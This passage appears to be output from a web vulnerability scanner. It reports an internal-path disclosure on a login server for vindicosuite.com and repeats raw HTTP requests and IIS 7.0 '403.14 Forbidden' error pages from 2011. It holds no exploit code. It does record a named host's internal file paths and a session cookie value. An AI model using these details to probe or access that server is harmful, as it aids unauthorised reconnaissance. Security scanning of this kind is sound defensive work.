th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "LOGIN.VINDICOSUITE.COM"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://login1.vindicosuite.com:80/App_Themes/</td></tr> <tr><th>Physical Path</th><td>d:\inetpub\login.vindicosuite.com\App_Themes\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,6002">View more information »</a></p> </fieldset> </div> </div> </body> </html>
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
Content-Length: 5439
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "LOGIN.VINDICOSUITE.COM"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://login1.vindicosuite.com:80/App_Themes/</td></tr> <tr><th>Physical Path</th><td>d:\inetpub\login.vindicosuite.com\App_Themes\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,6002">View more information »</a></p> </fieldset> </div> </div> </body> </html>
|
- /App_Themes/Default/
/App_Themes/Default/ |
Identified Internal Path(s)
d:\inetpub\login.vindicosuite.com\App_Themes\Default\
Request
GET /App_Themes/Default/ HTTP/1.1
Referer: http://login1.vindicosuite.com/App_Themes/Default/vindico.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Referer: http://login1.vindicosuite.com/App_Themes/Default/vindico.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login1.vindicosuite.com
Cookie: ASPSESSIONIDSQCRCQDD=OPKJIJIDONBADLJKEGGIEPJN
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
Content-Length: 5455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "LOGIN.VINDICOSUITE.COM"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://login1.vindicosuite.com:80/App_Themes/Default/</td></tr> <tr><th>Physical Path</th><td>d:\inetpub\login.vindicosuite.com\App_Themes\Default\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,6002">View more information »</a></p> </fieldset> </div> </div> </body> </html>
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Apr 2011 22:43:19 GMT
Content-Length: 5455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 7.0 Detailed Error - 403.14 - Forbidden</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;background:#CBE1EF;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 40px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;padding:4px 15px 4px 10px;margin:4px 0 8px -12px;_margin-top:0px; border-top:1px solid #EDEDED;border-left:1px solid #EDEDED;border-right:1px solid #969696; border-bottom:1px solid #969696;background:#E7ECF0;font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .config_source{background:#fff5c4;} .content-container p{margin:0 0 10px 0; }#details-left{width:35%;float:left;margin-right:2%; }#details-right{width:63%;float:left; }#server_version{width:96%;_height:1px;min-height:1px;margin:0 0 5px 0;padding:11px 2% 8px 2%;color:#FFFFFF; background-color:#5A7FA5;border-bottom:1px solid #C1CFDD;border-top:1px solid #4A6C8E;font-weight:normal; font-size:1em;color:#FFF;text-align:right; }#server_version p{margin:5px 0;} table{margin:4px 0 4px 0;width:100%;border:none;} td,th{vertical-align:top;padding:3px 0;text-align:left;font-weight:bold;border:none;} th{width:30%;text-align:right;padding-right:2%;font-weight:normal;} thead th{background-color:#ebebeb;width:25%; }#details-right th{width:20%;} table tr.alt td,table tr.alt th{background-color:#ebebeb;} .highlight-code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="header"><h1>Server Error in Application "LOGIN.VINDICOSUITE.COM"</h1></div> <div id="server_version"><p>Internet Information Services 7.0</p></div> <div id="content"> <div class="content-container"> <fieldset><legend>Error Summary</legend> <h2>HTTP Error 403.14 - Forbidden</h2> <h3>The Web server is configured to not list the contents of this directory.</h3> </fieldset> </div> <div class="content-container"> <fieldset><legend>Detailed Error Information</legend> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>DirectoryListingModule</td></tr> <tr><th>Notification</th><td>ExecuteRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>StaticFile</td></tr> <tr><th>Error Code</th><td>0x00000000</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>http://login1.vindicosuite.com:80/App_Themes/Default/</td></tr> <tr><th>Physical Path</th><td>d:\inetpub\login.vindicosuite.com\App_Themes\Default\</td></tr> <tr class="alt"><th>Logon Method</th><td>Anonymous</td></tr> <tr><th>Logon User</th><td>Anonymous</td></tr> </table> <div class="clear"></div> </div> </fieldset> </div> <div class="content-container"> <fieldset><legend>Most likely causes:</legend> <ul> <li>A default document is not configured for the requested URL, and directory browsing is not enabled on the server.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Things you can try:</legend> <ul> <li>If you do not want to enable directory browsing, ensure that a default document is configured and that the file exists.</li> <li> Enable directory browsing using IIS Manager. <ol> <li>Open IIS Manager.</li> <li>In the Features view, double-click Directory Browsing.</li> <li>On the Directory Browsing page, in the Actions pane, click Enable.</li> </ol> </li> <li>Verify that the configuration/system.webServer/directoryBrowse@enabled attribute is set to true in the site or application configuration file.</li> </ul> </fieldset> </div> <div class="content-container"> <fieldset><legend>Links and More Information</legend> This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server. <p><a href="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,6002">View more information »</a></p> </fieldset> </div> </div> </body> </html>